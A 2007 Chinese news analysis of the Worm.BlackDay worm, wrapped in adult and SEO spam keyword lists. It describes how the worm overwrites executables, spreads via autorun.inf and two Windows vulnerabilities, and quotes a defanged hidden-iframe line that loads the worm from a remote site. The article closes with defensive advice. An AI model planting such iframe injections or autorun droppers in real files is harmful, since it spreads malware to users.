成人在线你懂的-成人在线免费小视频-成人在线免费网站-成人在线免费视频观看-日韩精品国产一区二区-日韩精品国产一区

掃一掃
關注微信公眾號

專家談 Worm.BlackDay 病毒分析報告
2007-04-30   賽迪網

今日一朋友問起“末日陰影”,還以為是哪部好萊塢大片,細看下來,原來就是Worm/BlackDay這個“老”蠕蟲。其實這個蠕蟲在四月初就出現了,被冠了這么個噱頭名字。

目前這個病毒會影響到除Windows Vista外所有的Windows版本。病毒程序運行后會破壞正常文件,感染網頁文件,通過MS06-014和MS07-017漏洞傳播, 且被病毒破壞的文件無法修復,這點比較危險。





1、當系統中毒后,所有可執行文件圖標都變成了一個黑色炸彈的圖標,如下圖:

用戶一旦感染該病毒,電腦會自動彈出一個病毒作者的留言框:

2、病毒體內有如下字樣:

I can't change my sanguinary inbeing,never.I canfeel that the tears come by my face.Kill 
my self is the best,maybe.so Please.
My Name:wswhacker My age:17
I feeling free when I am not in prison.Can you feel my word?

(但此段文字在不同的版本里會有些許不同。)

3、該病毒會遍歷本地磁盤、可移動磁盤等存貯介質,發現有*.asp *.aspx *.php *.jsp *.htm *.html擴展名的腳本文件時進行感染:

在這些網頁腳本文件中插入一個Iframe標簽,添加惡意網址引用:

(iframe src="hxxp://www.d***youxi.net/Black-Day.htm" width=0 height=0)(/iframe)

當用戶打開這些網頁文件時,IE就會自動下載蠕蟲病毒。

(既然病毒目標是所有本地磁盤,查殺時就要注意全盤掃描。)

4、發現如下擴展名的文件時,將病毒體內容覆蓋到文件首部,使文件被破壞,無法恢復:

.exe .msc .dll .scr .pif .com

發現如下擴展名的文件時跳過:

.lnk

對于其他文件,當文件大小小于258048(病毒體大小)時,覆蓋文件,否則跳過。感染后的文件末尾加如下感染標志:wswhacker。

5、在每個磁盤根目錄下創建如下病毒文件,雙擊盤符時激活病毒:

autorun.inf
BLACK-DAY.EXE

這樣就可以借助U盤,MP3,移動硬盤等移動存儲介質傳播。

此病毒雖然對文件的破壞力比較強,好在傳染性一般。目前還沒有大規模的中毒報告。

建議開啟文件、網頁等監控,可以隨時監控病毒對上述文件實施的更改操作。插入移動存儲后,掃描移動磁盤后再運行文件。

【提示:為安全起見,文中用“*”代替了部分網址,并更改了Iframe標簽格式。】

熱詞搜索:

上一篇:在Linux操作系統下如何開啟硬盤DMA二
下一篇:局域網加速的一些問題以及心得體會

分享到: 收藏
主站蜘蛛池模板: 唐人街探案网剧1| 殷雪梅| 黑暗女监日本电影完整版叫什么| 成龙电影大全免费功夫片| 欧若拉歌词| 十万个冷笑话第二季| 狗年龄| 哥哥女人| 火花 电影| 简单的应急预案怎么写 | 泰迪熊 美剧| 大森南朋| 赤牙×柒cp| 浙江卫视周一至周五节目表| 山上的小屋免费阅读小说全文| 天上人间电影| 一年级数学小报简单又漂亮模板| 邓紫飞| 人民的名义电视剧免费版| 赌侠 1990 刘德华| 蜜蜂图片大全大图| 我的爷爷 电影| 电影青春期| 爆操大胸美女| 电影继母劳拉| 红河谷演员表| 瑜伽焰口全集 简体字| 忏悔三昧念3遍| x档案第二季| 转身离开| 陈建斌电影| 强电影| 二年级拍手歌生字组词| 高潮艺术| 黑色星期一| 第一介绍人与第二介绍人意见| 柏拉图的电影| 恶魔女狱长| 黑水电影| 金恒| 日本变态裸体挠痒痒视频|